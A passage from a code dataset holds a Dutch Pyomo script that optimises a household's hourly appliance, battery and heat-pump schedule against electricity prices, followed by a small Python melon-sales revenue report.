illustratie\nprint(\"----------TupleToList----------\")\n\nprint(Apparaten)\nprint(Wattages)\nprint(ExacteUren)\nprint(BeginUur)\nprint(FinaleTijdstip)\nprint(UrenWerk)\nprint(UrenNaElkaar)\nprint(SoortApparaat)\nprint(RememberSettings)\nprint(Status)\n\nprint(VastVerbruik)\n\nprint(Aantal)\nprint(Oppervlakte)\nprint(Rendement)\n\nprint(NamenBatterijen)\nprint(MaxEnergie)\nprint(OpgeslagenEnergie)\n\nprint(TemperatuurHuis)\nprint(Kost)\n\nprint(SentinelOptimalisatie)\nprint(SentinelInterface)\nprint(HuidigeDatum)\nprint(HuidigUur)\nprint(TijdSeconden)\n###################################################################################################################\n##### Gegevens uit de csv bestanden opvragen #####\nprint(\"----------GegevensOpvragen24uur----------\")\nPrijzen24uur, Gegevens24uur = gegevens_opvragen()\n###################################################################################################################\n##### Parameters updaten #####\nEFFICIENTIE = 0.2\nOPP_ZONNEPANELEN = 12\n\"\"\" Uit tabel Stroomprijzen en Weer \"\"\"\nprijzen = Prijzen24uur\nstroom_zonnepanelen = [irradiantie * EFFICIENTIE * OPP_ZONNEPANELEN for irradiantie in Gegevens24uur[1]]\n\n\"\"\" Uit tabel Geheugen \"\"\"\nnamen_apparaten = Apparaten\nwattagelijst = Wattages\nvoorwaarden_apparaten_exact = ExacteUren\nstarturen = BeginUur\neinduren = FinaleTijdstip\nwerkuren_per_apparaat = UrenWerk\nuren_na_elkaarVAR = UrenNaElkaar\ntypes_apparaten = SoortApparaat\n\n\"\"\" Extra gegevens voor het optimalisatiealgoritme \"\"\"\naantal_apparaten = len(wattagelijst)\nDelta_t = 1 # bekijken per uur\naantal_uren = len(prijzen)\n\n\"\"\" Uit tabel Batterijen \"\"\"\nbatterij_bovengrens = sum(MaxEnergie)\nhuidig_batterijniveau = sum(OpgeslagenEnergie)\nmax_opladen_batterij = 14\nmax_ontladen_batterij = 15\n\n\"\"\" Extra gegevens om realistischer te maken \"\"\"\nvast_verbruik_gezin = [12 for i in range(24)]\nmaximaal_verbruik_per_uur = [3500 for i in range(len(prijzen))]\nverkoopprijs_van_zonnepanelen = [prijzen[p] / 2 for p in range(len(prijzen))]\nverbruik_gezin_totaal = VastVerbruik\nverbruik_gezin_totaal = [[3,3,3] for i in range(24)]\n\n\"\"\" Uit tabel Huisgegevens \"\"\"\nbegintemperatuur_huis = TemperatuurHuis # in graden C\n\"\"\" Extra gegevens voor boilerfunctie \"\"\"\nverliesfactor_huis_per_uur = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] # in graden C\ntemperatuurwinst_per_uur = [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2] # in graden C\nondergrens = 17 # mag niet kouder worden dan dit\nbovengrens = 22 # mag niet warmer worden dan dit\n\n# controle op tegenstrijdigheden in code\n\nassert len(wattagelijst) == len(namen_apparaten) == len(voorwaarden_apparaten_exact) == len(\n werkuren_per_apparaat)\nfor i in range(len(voorwaarden_apparaten_exact)):\n if type(werkuren_per_apparaat[i]) == int:\n assert len(voorwaarden_apparaten_exact[i]) <= werkuren_per_apparaat[i]\n for p in range(len(voorwaarden_apparaten_exact[i])):\n if len(voorwaarden_apparaten_exact[i]) > 0:\n if type(voorwaarden_apparaten_exact[i][p]) == int and type(einduren[i]) == int:\n assert voorwaarden_apparaten_exact[i][p] < einduren[i]\n\n# Ter illustratie\nprint(\"----------ParametersBenoemen----------\")\nprint(\"prijzen\")\nprint(prijzen)\nprint(\"stroom_zonnepanelen\")\nprint(stroom_zonnepanelen)\nprint(\"namen_apparaten\")\nprint(namen_apparaten)\nprint(\"wattagelijst\")\nprint(wattagelijst)\nprint(\"voorwaarden_apparaten_exact\")\nprint(voorwaarden_apparaten_exact)\nprint(\"starturen\")\nprint(starturen)\nprint(\"einduren\")\nprint(einduren)\nprint(\"werkuren_per_apparaat\")\nprint(werkuren_per_apparaat)\nprint(\"uren_na_elkaarVAR\")\nprint(uren_na_elkaarVAR)\n\n\n###################################################################################################################\n# definiëren functies\ndef variabelen_constructor(lijst, aantal_apparaten, aantal_uren):\n for p in range(aantal_uren*aantal_apparaten): # totaal aantal nodige variabelen = uren maal apparaten\n lijst.add() # hier telkens nieuwe variabele aanmaken\n\ndef objectieffunctie(prijzen, variabelen, Delta_t, wattagelijst, aantal_uren, stroom_zonnepanelen, vast_verbruik_gezin,\n batterij_ontladen, batterij_opladen):\n obj_expr = 0\n for p in range(aantal_uren):\n subexpr = 0\n for q in range(len(wattagelijst)):\n subexpr = subexpr + wattagelijst[q] * variabelen[q * aantal_uren + (\n p + 1)] # eerst de variabelen van hetzelfde uur samentellen om dan de opbrengst van zonnepanelen eraf te trekken\n obj_expr = obj_expr + Delta_t * prijzen[p] * (subexpr - stroom_zonnepanelen[p] + vast_verbruik_gezin[p] +\n batterij_ontladen[p+1] + batterij_opladen[p+1])\n return obj_expr\n\ndef exacte_beperkingen(variabelen, voorwaarden_apparaten, aantal_apparaten, voorwaarden_apparaten_lijst, aantal_uren):\n for q in range(aantal_uren*aantal_apparaten):\n index_voor_voorwaarden = q//aantal_uren # hierdoor weet je bij welk apparaat de uur-constraint hoort\n indexnummers = voorwaarden_apparaten_lijst[index_voor_voorwaarden] # hier wordt de uur-constraint, horende bij een bepaald apparaat, opgevraagd\n for p in indexnummers:\n if type(p) != str: # kan ook dat er geen voorwaarde is, dan wordt de uitdrukking genegeerd\n voorwaarden_apparaten.add(expr=variabelen[p+ index_voor_voorwaarden*aantal_uren] == 1) # variabele wordt gelijk gesteld aan 1\n\ndef uiteindelijke_waarden(variabelen, aantaluren, namen_apparaten, wattagelijst, huidig_batterijniveau, verliesfactor,\n winstfactor, huidige_temperatuur, batterij_ontladen, batterij_opladen):\n print('-' * 30)\n print('De totale kost is', pe.value(m.obj), 'euro') # de kost printen\n kost = pe.value(m.obj)\n\n print('-' * 30)\n print('toestand apparaten (0 = uit, 1 = aan):')\n\n for p in range(len(variabelen)):\n if p % aantaluren == 0: # hierdoor weet je wanneer je het volgende apparaat begint te beschrijven\n print('toestel nr.', p / aantaluren + 1, '(', namen_apparaten[int(p / aantaluren)],\n ')') # opdeling maken per toestel\n print(pe.value(variabelen[p + 1]))\n print('Batterij_ontladen:')\n for p in range(1, aantaluren + 1):\n print(pe.value(batterij_ontladen[p]))\n print('Batterij_opladen:')\n for p in range(1, aantaluren+1):\n print(pe.value(batterij_opladen[p]))\n\n apparaten_aanofuit = []\n for p in range(len(namen_apparaten)):\n apparaten_aanofuit.append(pe.value(variabelen[aantaluren * p + 1]))\n nieuw_batterijniveau = pe.value(\n huidig_batterijniveau + batterij_ontladen[1] + batterij_opladen[1])\n i_warmtepomp = namen_apparaten.index('warmtepomp')\n nieuwe_temperatuur = pe.value(\n huidige_temperatuur + winstfactor[0] * variabelen[aantaluren * i_warmtepomp + 1] - verliesfactor[0])\n batterij_ontladen_uur1 = pe.value(batterij_ontladen[1])\n batterij_opladen_uur1 = pe.value(batterij_opladen[1])\n som = batterij_opladen_uur1 + batterij_ontladen_uur1\n return kost, apparaten_aanofuit, nieuw_batterijniveau, nieuwe_temperatuur, som\n\ndef beperkingen_aantal_uur(werkuren_per_apparaat, variabelen, voorwaarden_werkuren, aantal_uren, einduren, types_apparaten):\n for p in range(len(werkuren_per_apparaat)):\n som = 0\n for q in range(1,aantal_uren+1):\n som = som + variabelen[p*aantal_uren + q] # hier neem je alle variabelen van hetzelfde apparaat, samen\n if type(werkuren_per_apparaat[p]) == int and ((type(einduren[p]) == int and einduren[p] <= aantal_uren)\n or types_apparaten[p] == 'Always on'):\n voorwaarden_werkuren.add(expr = som == werkuren_per_apparaat[p]) # apparaat moet x uur aanstaan\n\ndef starttijd(variabelen, starturen, constraint_lijst_startuur, aantal_uren):\n for q in range(len(starturen)):\n if type(starturen[q]) != str:\n p = starturen[q]\n for s in range(1, p):\n constraint_lijst_startuur.add(expr= variabelen[aantal_uren*q + s] == 0)\n\ndef finaal_uur(finale_uren, variabelen, constraint_lijst_finaal_uur, aantal_uren):\n for q in range(len(finale_uren)): # dit is welk aparaat het over gaat\n if type(finale_uren[q]) == int and finale_uren[q] <= aantal_uren:\n p = finale_uren[q]-1 # dit is het eind uur, hierna niet meer in werking\n for s in range(p + 1, aantal_uren + 1):\n constraint_lijst_finaal_uur.add(expr=variabelen[(aantal_uren*q) + s] == 0)\n\ndef aantal_uren_na_elkaar(uren_na_elkaarVAR, variabelen, constraint_lijst_aantal_uren_na_elkaar, aantal_uren,\n variabelen_start, einduren):\n # Dat een bepaald apparaat x aantal uur moet werken staat al in beperking_aantal_uur dus niet meer hier\n # wel nog zeggen dat de som van de start waardes allemaal slechts 1 mag zijn\n for i in range(len(uren_na_elkaarVAR)): # zegt welk apparaat\n if type(uren_na_elkaarVAR[i]) == int and (type(einduren[i]) == int and einduren[i] <= aantal_uren):\n opgetelde_start = 0\n for p in range(1, aantal_uren + 1): # zegt welk uur het is\n opgetelde_start = opgetelde_start + variabelen_start[aantal_uren * i + p]\n #print('dit is eerste constraint', opgetelde_start)\n constraint_lijst_aantal_uren_na_elkaar.add(expr=opgetelde_start == 1)\n for i in range(len(uren_na_elkaarVAR)): # dit loopt de apparaten af\n if type(uren_na_elkaarVAR[i]) == int and (type(einduren[i]) == int and einduren[i] <= aantal_uren):\n #print('dit is nieuwe i', i)\n k = 0\n som = 0\n for p in range(0, aantal_uren): # dit loopt het uur af\n SENTINEL = 1\n #print('dit is een nieuwe p', p)\n # print('juist of fout', k < uren_na_elkaarVAR[i], k, uren_na_elkaarVAR[i])\n # print('juist of fout', k < p)\n while k < uren_na_elkaarVAR[i] and k < p + 1:\n # print('EERSTE while')\n som = som + variabelen_start[aantal_uren * i + p + 1]\n k = k + 1\n #print('dit is mijn som1', som, 'en is gelijk aan', variabelen[aantal_uren * i + p + 1])\n constraint_lijst_aantal_uren_na_elkaar.add(expr=variabelen[aantal_uren * i + p + 1] == som)\n SENTINEL = 0\n while k <= aantal_uren and k >= uren_na_elkaarVAR[i] and SENTINEL == 1:\n #print('tweede while', 'eerste index', aantal_uren * i + p + 1, 'tweede index',\n #aantal_uren * i + p - uren_na_elkaarVAR[i] +1)\n som = som + variabelen_start[aantal_uren * i + p + 1] - variabelen_start[aantal_uren * i + p - uren_na_elkaarVAR[i] + 1]\n #print('dit is mijn som2', som, 'en is gelijk aan', variabelen[aantal_uren * i + p + 1])\n k = k + 1\n SENTINEL = 0\n constraint_lijst_aantal_uren_na_elkaar.add(expr=variabelen[aantal_uren * i + p + 1] == som)\n\ndef voorwaarden_max_verbruik(variabelen, max_verbruik_per_uur, constraintlijst_max_verbruik, wattagelijst, delta_t,\n opbrengst_zonnepanelen, batterij_ontladen, batterij_opladen):\n totaal_aantal_uren = len(max_verbruik_per_uur)\n for p in range(1, len(max_verbruik_per_uur) + 1):\n som = 0\n for q in range(len(wattagelijst)):\n som = som + delta_t * wattagelijst[q] * (variabelen[q * totaal_aantal_uren + p])\n som = som + opbrengst_zonnepanelen[p-1] + batterij_opladen[p] + batterij_ontladen[p]\n uitdrukking = (-max_verbruik_per_uur[p - 1], som, max_verbruik_per_uur[p - 1])\n constraintlijst_max_verbruik.add(expr=uitdrukking)\n\ndef voorwaarden_warmteboiler(apparaten, variabelen,voorwaardenlijst, warmteverliesfactor, warmtewinst, aanvankelijke_temperatuur, ondergrens, bovengrens, aantaluren):\n temperatuur_dit_uur = aanvankelijke_temperatuur\n if not 'warmtepomp' in apparaten:\n return\n index_warmteboiler = apparaten.index('warmtepomp')\n beginindex_in_variabelen = index_warmteboiler*aantaluren +1\n if aanvankelijke_temperatuur < ondergrens:\n voorwaardenlijst.add(expr= variabelen[beginindex_in_variabelen] == 1)\n elif aanvankelijke_temperatuur > bovengrens:\n voorwaardenlijst.add(expr= variabelen[beginindex_in_variabelen] == 0)\n else:\n index_verlies = 0\n for p in range(beginindex_in_variabelen,beginindex_in_variabelen + aantaluren):\n temperatuur_dit_uur = temperatuur_dit_uur-warmteverliesfactor[index_verlies] + warmtewinst[index_verlies]*variabelen[p]\n uitdrukking = (ondergrens, temperatuur_dit_uur, bovengrens)\n voorwaardenlijst.add(expr= uitdrukking)\n index_verlies = index_verlies + 1\n\ndef som_tot_punt(variabelen, beginpunt, eindpunt):\n som = 0\n for i in range(beginpunt, eindpunt+1):\n som = som + variabelen[i]\n return som\n\ndef voorwaarden_batterij(batterij_ontladen, batterij_opladen, constraintlijst, aantaluren,\n huidig_batterijniveau, batterij_bovengrens):\n for q in range(1, aantaluren + 1):\n som_ontladen = som_tot_punt(batterij_ontladen, 1, q)\n som_opladen = som_tot_punt(batterij_opladen, 1, q)\n verschil = som_opladen + som_ontladen + huidig_batterijniveau\n constraintlijst.add(expr=(0, verschil, batterij_bovengrens))\n\n# een lijst maken die de stand van de batterij gaat bijhouden als aantal wat maal aantal uur\n# op het einde van het programma dan aanpassen wat die batterij het laatste uur heeft gedaan en zo bijhouden in de database in die variabele\n# het getal in die variabele trek je ook altijd op bij som ontladen en som ontladen hierboven\n\n# deze functie zal het aantal uur dat het apparaat moet werken verlagen op voorwaarden dat het apparaat ingepland stond\n# voor het eerste uur\ndef verlagen_aantal_uur(lijst, aantal_uren, te_verlagen_uren, namen_apparaten_def): # voor aantal uur mogen er geen '/' ingegeven worden, dan crasht het\n global con, cur, res\n print(\"Urenwerk na functie verlagen_aantal_uur\")\n res = cur.execute(\"SELECT UrenWerk FROM Geheugen\")\n print(res.fetchall())\n for i in range(len(te_verlagen_uren)):\n if pe.value(lijst[i * aantal_uren + 1]) == 1 and namen_apparaten_def[i] != \"warmtepomp\" and \\\n namen_apparaten_def[i] != \"batterij_ontladen\" and namen_apparaten_def[i] != \"batterij_opladen\":\n cur.execute(\"UPDATE Geheugen SET UrenWerk =\" + str(te_verlagen_uren[i] - 1) +\n \" WHERE Nummering =\" + str(i))\n con.commit()\n res = cur.execute(\"SELECT UrenWerk FROM Geheugen\")\n print(res.fetchall())\n\n\ndef uur_omzetten(exacte_uren1apparaat):\n string = \"'\"\n for i2 in range(len(exacte_uren1apparaat)):\n if exacte_uren1apparaat[i2] == \"/\":\n return str(0)\n else:\n string = string + str(exacte_uren1apparaat[i2]) + \":\"\n string = string[0:-1] + \"'\"\n return string\n\n\n# deze functie zal exacte uren als 'aan' aanduiden op voorwaarde dat het eerste uur als 'aan' was aangeduid en er ook was aangeduid dat\n# het apparaat x aantal uur na elkaar moest aanstaan, elk uur tot x-1 zal dan al naar 'aan' worden aangeduid voor de volgende berekeningen terug beginnen\ndef opeenvolging_opschuiven(lijst, aantal_uren, opeenvolgende_uren, oude_exacte_uren):\n global con, cur, res\n print(\"ExacteUren en eventueel UrenNaElkaar na functie opeenvolging_opschuiven \")\n res = cur.execute(\"SELECT ExacteUren FROM Geheugen\")\n print(res.fetchall())\n res = cur.execute(\"SELECT UrenNaElkaar FROM Geheugen\")\n print(res.fetchall())\n for i in range(len(opeenvolgende_uren)):\n if type(opeenvolgende_uren[i]) == int and pe.value(lijst[i * aantal_uren + 1]) == 1:\n nieuwe_exacte_uren = []\n for p in range(1, opeenvolgende_uren[i] + 1): # dus voor opeenvolgende uren 5, p zal nu 1,2,3,4\n nieuwe_exacte_uren.append(p)\n cur.execute(\"UPDATE Geheugen SET ExacteUren =\" + uur_omzetten(nieuwe_exacte_uren) +\n \" WHERE Nummering =\" + str(i))\n cur.execute(\"UPDATE Geheugen SET UrenNaElkaar =\" + str(0) +\n \" WHERE Nummering =\" + str(i))\n con.commit()\n\n # Ter illustratie\n res = cur.execute(\"SELECT ExacteUren FROM Geheugen\")\n print(res.fetchall())\n res = cur.execute(\"SELECT UrenNaElkaar FROM Geheugen\")\n print(res.fetchall())\n\n # in database toevoegen dat i^de lijst 1,2,3,4 allen op 1 worden gezet dus bij in exact uur lijst, dus elke p in lijst i toevoegen\n\n # extra: bij dit apparaat '' zetten in de plaats van opeenvolgende aantal uur zodat die geen 24 constraints meer moet gaan maken achteraf\n\n\n# deze functie zal alle exacte uren die er waren verlagen met 1, als het 0 wordt dan wordt het later verwijderd uit de lijst\ndef verlagen_exacte_uren(exacte_uren):\n global con, cur, res\n print(\"ExacteUren na functie verlagen_exacte_uren\")\n res = cur.execute(\"SELECT ExacteUren FROM Geheugen\")\n print(res.fetchall())\n for i in range(len(exacte_uren)): # dit gaat de apparaten af\n if exacte_uren[i] != ['/']:\n verlaagde_exacte_uren = []\n for uur in exacte_uren[i]: # dit zal lopen over al de 'exacte uren' van een specifiek apparaat\n if len(exacte_uren[i]) != 1:\n if uur - 1 != 0:\n verlaagde_exacte_uren.append(uur - 1)\n else:\n verlaagde_exacte_uren.append(uur - 1)\n if verlaagde_exacte_uren[0] == 0:\n verlaagde_exacte_uren = \"/\"\n cur.execute(\"UPDATE Geheugen SET ExacteUren =\" + uur_omzetten(verlaagde_exacte_uren) +\n \" WHERE Nummering =\" + str(i))\n con.commit()\n\n # Ter illustratie\n res = cur.execute(\"SELECT ExacteUren FROM Geheugen\")\n print(res.fetchall())\n\n\n# deze functie zal een apparaat volledig verwijderen uit alle lijsten, wnr het aantal uur dat het moet werken op nul is gekomen\ndef verwijderen_uit_lijst_wnr_aantal_uur_0(aantal_uren_per_apparaat, lijst_met_wattages,\n exacte_uren, prijzen_stroom, einduren, aantal_uren):\n global con, cur, res\n # uren_na_elkaarVAR wordt gebaseerd op werkuren per apparaat dus die moet je niet zelf meer aanpassen\n print(\"Gegevens verwijderen na functie verwijderen_uit_lijst_wnr_aantal_uur_0\")\n res = cur.execute(\"SELECT FinaleTijdstip FROM Geheugen\")\n print(res.fetchall())\n for i in range(len(aantal_uren_per_apparaat)):\n if aantal_uren_per_apparaat[\n i] == \"/\": # dan gaan we dit apparaat overal verwijderen uit alle lijsten die we hebben\n # eerst lijst met wattages apparaat verwijderen\n cur.execute(\"UPDATE Geheugen SET FinaleTijdstip =\" + str(0) +\n \" WHERE Nummering =\" + str(i))\n # geen nut\n # cur.execute(\"UPDATE Geheugen SET Wattages =\" + str(0) +\n # \" WHERE Nummering =\" + str(i))\n # cur.execute(\"UPDATE Geheugen SET ExacteUren =\" + str(0) +\n # \" WHERE Nummering =\" + str(i))\n # voorlopig niet doen\n # cur.execute(\"UPDATE Geheugen SET Apparaten =\" + str(0) +\n # \" WHERE Nummering =\" + str(i))\n con.commit()\n res = cur.execute(\"SELECT FinaleTijdstip FROM Geheugen\")\n print(res.fetchall())\n\n\n# deze functie zal het finale uur eentje verlagen\ndef verlagen_finale_uur(klaar_tegen_bepaald_uur):\n global con, cur, res\n print(\"FinaleTijdstip na functie verlagen_finale_uur\")\n res = cur.execute(\"SELECT FinaleTijdstip FROM Geheugen\")\n print(res.fetchall())\n for i in range(len(klaar_tegen_bepaald_uur)):\n if type(klaar_tegen_bepaald_uur[i]) == int:\n cur.execute(\"UPDATE Geheugen SET FinaleTijdstip =\" + str(klaar_tegen_bepaald_uur[i] - 1) +\n \" WHERE Nummering =\" + str(i))\n con.commit()\n # Ter illustratie\n res = cur.execute(\"SELECT FinaleTijdstip FROM Geheugen\")\n print(res.fetchall())\n\n\ndef verlagen_start_uur(start_op_bepaald_uur):\n global con, cur, res\n print(\"Startuur na functie verlagen_start_uur\")\n res = cur.execute(\"SELECT BeginUur FROM Geheugen\")\n print(res.fetchall())\n for i in range(len(start_op_bepaald_uur)):\n if type(start_op_bepaald_uur[i]) == int:\n cur.execute(\"UPDATE Geheugen SET BeginUur =\" + str(start_op_bepaald_uur[i] - 1) +\n \" WHERE Nummering =\" + str(i))\n con.commit()\n # Ter illustratie\n res = cur.execute(\"SELECT BeginUur FROM Geheugen\")\n print(res.fetchall())\n # zo aanpassen in database nu\n # einduren[i] = einduren[i] - 1\ndef vast_verbruik_aanpassen(verbruik_gezin_totaal, current_hour):\n if len(verbruik_gezin_totaal) > 0:\n if len(verbruik_gezin_totaal[current_hour]) > 0:\n del verbruik_gezin_totaal[current_hour][0]\n verbruik_gezin_totaal[current_hour].append(uniform(2,4))\n\n#######################################################################################################\n# aanmaken lijst met binaire variabelen\nm.apparaten = pe.VarList(domain=pe.Binary)\nm.apparaten.construct()\nvariabelen_constructor(m.apparaten, aantal_apparaten, aantal_uren) # maakt variabelen aan die apparaten voorstellen\n\n# variabelen aanmaken batterij en domein opleggen\nm.batterij_ontladen = pe.VarList()\nm.batterij_opladen = pe.VarList()\nm.voorwaarden_batterij_grenzen = pe.ConstraintList()\nvariabelen_constructor(m.batterij_ontladen, 1, aantal_uren)\nvariabelen_constructor(m.batterij_opladen, 1, aantal_uren)\nfor p in range(1, aantal_uren+1):\n m.voorwaarden_batterij_grenzen.add(expr = (-max_ontladen_batterij, m.batterij_ontladen[p], 0))\n m.voorwaarden_batterij_grenzen.add(expr = (0, m.batterij_opladen[p], max_opladen_batterij))\n\n# objectief functie aanmaken\nobj_expr = objectieffunctie(prijzen, m.apparaten, Delta_t, wattagelijst, aantal_uren, stroom_zonnepanelen,\n vast_verbruik_gezin, m.batterij_ontladen, m.batterij_opladen) # somfunctie die objectief creeërt\nm.obj = pe.Objective(sense=pe.minimize, expr=obj_expr)\n\n# aanmaken constraint om op exact uur aan of uit te staan\nm.voorwaarden_exact = pe.ConstraintList() # voorwaarde om op een exact uur aan of uit te staan\nm.voorwaarden_exact.construct()\nexacte_beperkingen(m.apparaten, m.voorwaarden_exact, aantal_apparaten, voorwaarden_apparaten_exact,\n aantal_uren) # beperkingen met vast uur\n\n# aanmaken constraint om aantal werkuren vast te leggen\nm.voorwaarden_aantal_werkuren = pe.ConstraintList()\nm.voorwaarden_aantal_werkuren.construct()\nbeperkingen_aantal_uur(werkuren_per_apparaat, m.apparaten, m.voorwaarden_aantal_werkuren, aantal_uren, einduren,\n types_apparaten) # moet x uur werken, maakt niet uit wanneer\n\n# aanmaken constraint om startuur vast te leggen\nm.voorwaarden_startuur = pe.ConstraintList()\nm.voorwaarden_startuur.construct()\nstarttijd(m.apparaten, starturen, m.voorwaarden_startuur, aantal_uren)\n\n# aanmaken constraint om een finaal uur vast te leggen\nm.voorwaarden_finaal_uur = pe.ConstraintList()\nm.voorwaarden_finaal_uur.construct()\nfinaal_uur(einduren, m.apparaten, m.voorwaarden_finaal_uur, aantal_uren) # moet na een bepaald uur klaarzijn\n\n# Voor functie aantal_uren_na_elkaar\nm.apparatenstart = pe.VarList(domain=pe.Binary)\nm.apparatenstart.construct()\nvariabelen_constructor(m.apparatenstart, aantal_apparaten, aantal_uren)\nm.voorwaarden_aantal_uren_na_elkaar = pe.ConstraintList()\naantal_uren_na_elkaar(uren_na_elkaarVAR, m.apparaten, m.voorwaarden_aantal_uren_na_elkaar, aantal_uren,\n m.apparatenstart, einduren)\n\n# voorwaarden maximale verbruik per uur\nm.voorwaarden_maxverbruik = pe.ConstraintList()\nm.voorwaarden_maxverbruik.construct()\nvoorwaarden_max_verbruik(m.apparaten, maximaal_verbruik_per_uur, m.voorwaarden_maxverbruik, wattagelijst, Delta_t,\n stroom_zonnepanelen, m.batterij_ontladen, m.batterij_opladen)\n\n# voorwaarden warmtepomp\nm.voorwaarden_warmtepomp = pe.ConstraintList()\nvoorwaarden_warmteboiler(namen_apparaten, m.apparaten, m.voorwaarden_warmtepomp, verliesfactor_huis_per_uur,\n temperatuurwinst_per_uur, begintemperatuur_huis, ondergrens, bovengrens, aantal_uren)\n\n# voorwaarden batterij\nm.voorwaarden_batterij = pe.ConstraintList()\nvoorwaarden_batterij(m.batterij_ontladen, m.batterij_opladen, m.voorwaarden_batterij, aantal_uren,\n huidig_batterijniveau, batterij_bovengrens)\n\nresult = solver.solve(m)\n\nprint(result)\n# waarden teruggeven\nvast_verbruik_aanpassen(verbruik_gezin_totaal, current_hour)\n\nkost, apparaten_aanofuit, nieuw_batterijniveau, nieuwe_temperatuur, pos_of_neg_opladen= uiteindelijke_waarden(m.apparaten, aantal_uren,\n namen_apparaten,\n wattagelijst,\n huidig_batterijniveau,\n verliesfactor_huis_per_uur,\n temperatuurwinst_per_uur,\n begintemperatuur_huis, m.batterij_ontladen,\n m.batterij_opladen)\n\n# deze functies passen de lijsten aan, rekening houdend met de apparaten die gewerkt hebben op het vorige uur\nverlagen_aantal_uur(m.apparaten, aantal_uren, werkuren_per_apparaat, namen_apparaten)\n\n# deze lijn moet sws onder 'verlagen exacte uren' staan want anders voeg je iets toe aan de database en ga je vervolgens dit opnieuw verlagen\nopeenvolging_opschuiven(m.apparaten, aantal_uren, uren_na_elkaarVAR, voorwaarden_apparaten_exact)\n\nres = cur.execute(\"SELECT Apparaten FROM Geheugen\")\nListTuplesApparaten = res.fetchall()\nindex = -1\nApparaten = tuples_to_list(ListTuplesApparaten, \"Apparaten\", index)\nif len(Apparaten) != len(ListTuplesApparaten):\n index = len(Apparaten)\nres = cur.execute(\"SELECT ExacteUren FROM Geheugen\")\nListTuplesExacteUren = res.fetchall()\nExacteUren = tuples_to_list(ListTuplesExacteUren, \"ExacteUren\", index)\n\nverlagen_exacte_uren(ExacteUren)\n\nres = cur.execute(\"SELECT UrenWerk FROM Geheugen\")\nListTuplesUrenWerk = res.fetchall()\nUrenWerk = tuples_to_list(ListTuplesUrenWerk, \"UrenWerk\", index)\n\nverwijderen_uit_lijst_wnr_aantal_uur_0(UrenWerk, wattagelijst, voorwaarden_apparaten_exact, prijzen,\n einduren, aantal_uren)\n\nres = cur.execute(\"SELECT FinaleTijdstip FROM Geheugen\")\nListTuplesFinaleTijdstip = res.fetchall()\nFinaleTijdstip = tuples_to_list(ListTuplesFinaleTijdstip, \"FinaleTijdstip\", index)\n\nverlagen_finale_uur(FinaleTijdstip)\n\nverlagen_start_uur(starturen)\ncon.commit()\n'''\n#Nu zullen er op basis van de berekeningen aanpassingen moeten gedaan worden aan de database\n#wnr iets het eerste uur wordt berekend als 'aan' dan moeten er bij de volgende berekeningen er mee rekening gehouden worden\n#dat dat bepaald apparaat heeft gedraaid op dat uur, dus aantal draai uur is een uur minder, en wnr het drie uur na elkaar moest draaien en het eerste uur werd aangeduid als 'aan', dan moet bij de volgende berekening 1 en 2 nog als 'aan' aangeduid worden\n#een batterij is eigenlijk ook gwn aantal uur dat die nog moet werken een uur verlagen\n\n#nog overal in elke functie bijzetten wat er moet gebeuren als er geen integer in staat maar die string\n'''","repo_name":"vannesaugust/P-O3","sub_path":"Geheel algoritme/O_abstract_model.py","file_name":"O_abstract_model.py","file_ext":"py","file_size_in_byte":41853,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30669829150","text":"SALESPERSON_INDEX = 0\nINTERNET_INDEX = 1\n\n#Sets melon prices\nmelon_prices = {\"Musk\": 1.15, \"Hybrid\": 1.30, \n \"Watermelon\": 1.75, \"Winter\": 4.00 }\n\n#Prints pretty line of stars\nprint(\"*\" * 80)\n\n\ndef get_melon_sales(melon_type_orders):\n \"\"\" Takes in a sales order and provides data on # of each melon sold,\n price of melon, and total sales revenue for each melon.\"\"\"\n \n #Opens file\n melon_order = open(melon_type_orders)\n #Sets empty dictionary\n melon_type_data = {}\n\n #sets up count dictionary per melon\n for line in melon_order:\n order_num, melon_type, melon_count = line.split(\"|\")\n melon_count = int(melon_count)\n if melon_type in melon_type_data:\n melon_type_data[melon_type][\"Count\"] += melon_count\n else:\n melon_type_data[melon_type] = {\"Count\": melon_count}\n\n #adds Price and Sales_Total dictionary per melon\n for melon_type in melon_prices:\n melon_type_data[melon_type][\"Price\"] = melon_prices[melon_type]\n melon_type_data[melon_type][\"Sales_Total\"] = \\\n melon_type_data[melon_type][\"Price\"] * \\\n melon_type_data[melon_type][\"Count\"]\n \n #Prints the sales report per melon \n for melon_type in melon_type_data:\n print(\"We sold {} {} melons at ${:.2f} each for a total of ${:.2f}\"\\\n .format(melon_type_data[melon_type][\"Count\"],\\\n melon_type, melon_type_data[melon_type][\"Price\"],\\\n melon_type_data[melon_type][\"Sales_Total\"]))\n \n melon_order.close()\nget_melon_sales(\"orders-by-type.txt\")\n\n\nprint(\"*\" * 80)\n\ndef sales_type_summary(sales_file):\n sales_info = open(sales_file)\n \n sales_person_revenue = 0\n online_revenue = 0\n\n #Unpacks sales info doc\n for line in sales_info:\n sale_num, id_num, name, revenue = line.split(\"|\")\n id_num = int(id_num)\n\n #adds revenue to appropriate sales type\n if id_num > 0:\n sales_person_revenue += float(revenue)\n else:\n online_revenue += float(revenue)\n\n #Prints sales type summary \n print(\"Salespeople generated ${:.2f} in revenue.\".format(sales_person_revenue))\n print(\"Internet sales generated ${:.2f} in revenue.\".format(online_revenue))\n\n #evaluates efficacy of sales people \n if sales_person_revenue > online_revenue:\n print(\"Guess there's some value to those salespeople after all.\")\n else:\n print(\"Time to fire the sales team! Online sales rule all!\")\n\nsales_type_summary(\"orders-with-sales.txt\")\nprint(\"*\" * 80)\n\n# sales = [0, 0]\n# for line in f:\n# d = line.split(\"|\")\n# if d[1] == \"0\":\n# sales[0] += float(d[3])\n# else:\n# sales[1] += float(d[3])\n# print(\"Salespeople generated ${:.2f} in revenue.\".format(sales[1]))\n# print(\"Internet sales generated ${:.2f} in revenue.\".format(sales[0]))\n# if sales[1] > sales[0]:\n# print(\"Guess there's some value to those salespeople after all.\")\n# else:\n# print(\"Time to fire the sales team! Online sales rule all!\")\n# print(\"******************************************\")\n","repo_name":"CoderCarrot/HB_Homework","sub_path":"melon-sales-report/accounting.py","file_name":"accounting.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9943002655","text":"#!/usr/bin/python3\n\"\"\"Defines a class 